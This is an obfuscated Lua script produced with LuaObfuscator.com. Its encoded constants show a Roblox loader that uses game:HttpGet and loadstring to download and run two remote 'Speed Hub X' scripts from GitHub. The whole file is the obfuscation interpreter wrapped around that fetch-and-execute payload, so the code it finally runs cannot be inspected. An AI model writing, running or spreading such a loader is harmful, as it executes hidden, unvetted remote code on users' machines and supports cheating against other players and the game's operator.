--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v106=0;local v107;while true do if (v106==1) then return v107;end if (v106==0) then v107=v5(v82,v19);v19=nil;v106=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -(1 + 0))^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v83-(v83%1) ;else local v84=2^(v32-(932 -(857 + 74))) ;return (((v31%(v84 + v84))>=v84) and (569 -(367 + 201))) or ((146 + 781) -(214 + 713)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=877 -(282 + 595) ;local v36;local v37;while true do if (v35==1) then return (v37 * (1893 -(338 + 1185 + 114))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + ((959 -(892 + 65)) -0) ;v35=(2542 -1476) -(68 + 997) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + ((12 -7) -2) );v18=v18 + (7 -3) ;return (v41 * (16777566 -(64 + 23 + (1045 -782)))) + (v40 * (65716 -(67 + 113))) + (v39 * (188 + 68)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=953 -(802 + 150) ;local v45=(v20(v43,2 -1 ,36 -16 ) * ((2 + 0)^(1029 -(915 + 82)))) + v42 ;local v46=v20(v43,(188 -129) -38 ,19 + 12 );local v47=((v20(v43,32)==(1 -0)) and  -(1188 -(459 + 610 + 118))) or (2 -1) ;if (v46==((0 -0) -0)) then if (v45==0) then return v47 * ((438 -(145 + 293)) + 0) ;else local v92=0;while true do if (v92==0) then v46=1 -0 ;v44=0;break;end end end elseif (v46==2047) then return ((v45==(0 + (430 -(44 + 386)))) and (v47 * ((792 -(368 + 423))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1041 -(10 + 8)) ) * (v44 + (v45/((7 -(1491 -(998 + 488)))^(494 -(416 + 26))))) ;end local function v25(v48) local v49;if  not v48 then local v85=0;while true do if (v85==(0 + 0)) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(773 -(201 + 571)) );v18=v18 + v48 ;local v50={};for v65=(4741 -3602) -(116 + 1022) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if ((0 + 0)==v51) then v52=(function() return function(v101,v102,v103) local v104=(function() return 698 -(208 + 490) ;end)();local v105=(function() return;end)();while true do if (v104==(0 + 0)) then v105=(function() return 0;end)();while true do if (0~=v105) then else local v163=(function() return 0;end)();local v164=(function() return;end)();while true do if (v163==(0 + 0)) then v164=(function() return 836 -(660 + 176) ;end)();while true do if (v164~=(0 + 0)) then else local v196=(function() return 0;end)();while true do if (v196~=0) then else v101[v102-#"\\" ]=(function() return v103();end)();return v101,v102,v103;end end end end break;end end end end break;end end end;end)();v53=(function() return {};end)();v54=(function() return {};end)();v55=(function() return {};end)();v51=(function() return 203 -(14 + 188) ;end)();end if (v51==(676 -(534 + 141))) then local v89=(function() return 0 + 0 ;end)();local v90=(function() return;end)();while true do if (v89==(0 + 0)) then v90=(function() return 0;end)();while true do if (v90~=(2 + 0)) then else v51=(function() return 2;end)();break;end if (v90==0) then v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v90=(function() return 1;end)();end if (v90==(1 -0)) then v58=(function() return {};end)();for v114= #"~",v57 do local v115=(function() return 0 -0 ;end)();local v116=(function() return;end)();local v117=(function() return;end)();local v118=(function() return;end)();while true do if (1==v115) then v118=(function() return nil;end)();while true do if (v116~=0) then else local v194=(function() return 0;end)();while true do if (v194==1) then v116=(function() return 1 + 0 ;end)();break;end if (0==v194) then v117=(function() return v21();end)();v118=(function() return nil;end)();v194=(function() return 1 + 0 ;end)();end end end if (v116==1) then if (v117== #"}") then v118=(function() return v21()~=0 ;end)();elseif (v117==(398 -(115 + 281))) then v118=(function() return v24();end)();elseif (v117~= #"19(") then else v118=(function() return v25();end)();end v58[v114]=(function() return v118;end)();break;end end break;end if (v115~=(0 -0)) then else v116=(function() return 0 + 0 ;end)();v117=(function() return nil;end)();v115=(function() return 1;end)();end end end v90=(function() return 2;end)();end end break;end end end if (v51~=2) then else v56[ #"91("]=(function() return v21();end)();for v93= #"~",v23() do local v94=(function() return 0 -0 ;end)();local v95=(function() return;end)();while true do if (v94==(0 -0)) then v95=(function() return v21();end)();if (v20(v95, #"{", #"~")~=(867 -(550 + 317))) then else local v110=(function() return 0;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v110==(2 -0)) then if (v20(v112, #"}", #"~")== #".") then v113[2 -0 ]=(function() return v58[v113[5 -3 ]];end)();end if (v20(v112,287 -(134 + 151) ,1667 -(970 + 695) )== #"~") then v113[ #"asd"]=(function() return v58[v113[ #"xnx"]];end)();end v110=(function() return 3;end)();end if (v110==3) then if (v20(v112, #"-19", #"asd")== #"[") then v113[ #"?id="]=(function() return v58[v113[ #"asd1"]];end)();end v53[v93]=(function() return v113;end)();break;end if (v110~=(1 -0)) then else local v172=(function() return 0;end)();while true do if (v172~=1) then else v110=(function() return 2;end)();break;end if (v172~=(1990 -(582 + 1408))) then else v113=(function() return {v22(),v22(),nil,nil};end)();if (v111==0) then local v197=(function() return 0;end)();while true do if (0==v197) then v113[ #"91("]=(function() return v22();end)();v113[ #"?id="]=(function() return v22();end)();break;end end elseif (v111== #"|") then v113[ #"xnx"]=(function() return v23();end)();elseif (v111==2) then v113[ #"91("]=(function() return v23() -((6 -4)^16) ;end)();elseif (v111== #"asd") then local v203=(function() return 0 -0 ;end)();local v204=(function() return;end)();while true do if (v203==(0 -0)) then v204=(function() return 1824 -(1195 + 629) ;end)();while true do if (v204==0) then v113[ #"xxx"]=(function() return v23() -((2 -0)^(257 -(187 + 54))) ;end)();v113[ #".dev"]=(function() return v22();end)();break;end end break;end end end v172=(function() return 1;end)();end end end if ((780 -(162 + 618))==v110) then local v173=(function() return 0 + 0 ;end)();while true do if (0~=v173) then else v111=(function() return v20(v95,2, #"xxx");end)();v112=(function() return v20(v95, #"0313",4 + 2 );end)();v173=(function() return 1 -0 ;end)();end if (v173==1) then v110=(function() return 1 -0 ;end)();break;end end end end end break;end end end for v96= #"{",v23() do v54,v96,v28=(function() return v52(v54,v96,v28);end)();end return v56;end end end local function v29(v59,v60,v61) local v62=v59[1 + 0 ];local v63=v59[1638 -(1373 + 263) ];local v64=v59[1003 -(451 + 549) ];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1 + 0 ;local v72= -(1 -0);local v73={};local v74={...};local v75=v12("#",...) -(1385 -(746 + 638)) ;local v76={};local v77={};for v86=0 + 0 ,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + (1 -0) ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + (342 -(218 + 45 + 78)) ;local v79;local v80;while true do v79=v67[v71];v80=v79[1582 -(1535 + (120 -74)) ];if ((v80<=(5 + 0)) or (2654>=2996)) then if ((3978>2104) and (v80<=2)) then if (v80<=((0 -0) + (1551 -(1126 + 425)))) then v77[v79[562 -(306 + 254) ]]=v79[3]~=(0 + 0) ;elseif (v80>(1 -(405 -(118 + 287)))) then v77[v79[1469 -(899 + 568) ]]=v61[v79[2 + 1 ]];else v77[v79[2]]={};end elseif ((v80<=(7 -4)) or (3273>4573)) then do return;end elseif ((2995>1541) and (v80==(607 -(268 + 335)))) then local v122=290 -(60 + 230) ;local v123;local v124;local v125;local v126;while true do if ((3249>953) and (v122==(576 -(426 + 146)))) then v79=v67[v71];v77[v79[1 + 1 ]]();v71=v71 + 1 ;v79=v67[v71];v122=1461 -(282 + 1174) ;end if ((812 -(569 + 242))==v122) then v71=v71 + (2 -1) ;v79=v67[v71];v126=v79[2];v124,v125=v70(v77[v126](v13(v77,v126 + 1 ,v79[1 + 2 ])));v122=1026 -(706 + 318) ;end if ((v122==(1254 -(721 + (2077 -1547)))) or (3151<1284)) then v79=v67[v71];v126=v79[1123 -(118 + 1003) ];v77[v126]=v77[v126](v13(v77,v126 + (1272 -(945 + 326)) ,v72));v71=v71 + (2 -1) ;v122=4 + 0 ;end if ((5==v122) or (1850==1529)) then v71=v79[8 -5 ];break;end if (v122==2) then v72=(v125 + v126) -((1078 -(142 + 235)) -(271 + 429)) ;v123=0 + 0 ;for v191=v126,v72 do v123=v123 + (1501 -(1408 + 92)) ;v77[v191]=v124[v123];end v71=v71 + (1087 -((2091 -1630) + 625)) ;v122=1291 -(993 + 295) ;end if ((821<2123) and (v122==0)) then v123=nil;v124,v125=nil;v126=nil;v77[v79[1 + 1 ]]=v79[3]~=(1171 -(418 + 753)) ;v122=1 + 0 ;end end else local v127;local v128,v129;local v130;local v131;v77[v79[1 + 1 ]]=v61[v79[1 + 2 ]];v71=v71 + 1 + 0 ;v79=v67[v71];v131=v79[531 -(406 + 123) ];v130=v77[v79[1772 -(1749 + 5 + 15) ]];v77[v131 + (978 -(553 + 424)) + 0 ]=v130;v77[v131]=v130[v79[1326 -((2361 -1112) + 73) ]];v71=v71 + 1 ;v79=v67[v71];v77[v79[1 + 1 ]]=v79[1148 -(466 + 679) ];v71=v71 + (2 -1) ;v79=v67[v71];v77[v79[2]]=v79[8 -5 ]~=0 ;v71=v71 + (1901 -(94 + 12 + 1794)) ;v79=v67[v71];v131=v79[1 + 1 ];v128,v129=v70(v77[v131](v13(v77,v131 + 1 + 0 ,v79[8 -5 ])));v72=(v129 + v131) -(1 + 0) ;v127=0 -0 ;for v165=v131,v72 do v127=v127 + (115 -(4 + 110)) ;v77[v165]=v128[v127];end v71=v71 + 1 ;v79=v67[v71];v131=v79[2];v77[v131]=v77[v131](v13(v77,v131 + 1 ,v72));v71=v71 + ((341 + 244) -(57 + 527)) ;v79=v67[v71];v77[v79[2]]();v71=v71 + (1428 -(41 + 1386)) ;v79=v67[v71];v77[v79[105 -(8 + 9 + 86) ]]=v61[v79[3 + 0 ]];v71=v71 + ((1 + 0) -0) ;v79=v67[v71];v77[v79[5 -3 ]]=v61[v79[169 -(122 + 44) ]];v71=v71 + (1 -0) ;v79=v67[v71];v131=v79[6 -(8 -4) ];v130=v77[v79[3 + 0 ]];v77[v131 + 1 + 0 ]=v130;v77[v131]=v130[v79[4]];end elseif (v80<=(16 -8)) then if (v80<=6) then v71=v79[3];elseif (v80>(72 -((83 -53) + 35))) then v77[v79[2 + 0 ]]=v79[1260 -(1043 + 214) ];elseif ((902<2325) and (v77[v79[7 -5 ]]==v79[4])) then v71=v71 + (1213 -(323 + 889)) ;else v71=v79[3];end elseif ((858<=2962) and (v80<=(26 -16))) then if (v80>(589 -(361 + 219))) then local v154=v79[322 -(53 + 267) ];local v155,v156=v70(v77[v154](v13(v77,v154 + 1 + 0 ,v79[416 -(15 + 398) ])));v72=(v156 + v154) -((2200 -1217) -(18 + 964)) ;local v157=0 + 0 ;for v168=v154,v72 do v157=v157 + 1 ;v77[v168]=v155[v157];end else local v158=0 -0 ;local v159;local v160;while true do if (((4 -3) + 0)==v158) then v77[v159 + 1 + 0 ]=v160;v77[v159]=v160[v79[854 -(20 + 830) ]];break;end if ((v158==(0 + 0)) or (3946<1288)) then v159=v79[(881 -(239 + 514)) -(116 + 10) ];v160=v77[v79[1 + 2 ]];v158=739 -(542 + 196) ;end end end elseif ((v80==11) or (3242==567)) then v77[v79[3 -1 ]]();else local v161=v79[2];v77[v161]=v77[v161](v13(v77,v161 + 1 + 0 ,v72));end v71=v71 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F41686D6164562Q392F53702Q65642D4875622D582F6D61696E2F53702Q6564253230487562253230582E6C756103513Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F75446F6775696D2F75446F6775696D2F726566732F68656164732F6D61696E2F73702Q65642D687562504554474F2100174Q00017Q001208000100013Q00260700010002000100010004063Q00020001001202000200023Q001205000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q000300030004001208000500064Q0004000600016Q000300066Q00023Q00024Q00020001000100044Q001600010004063Q000200012Q00033Q00017Q00",v9(),...);
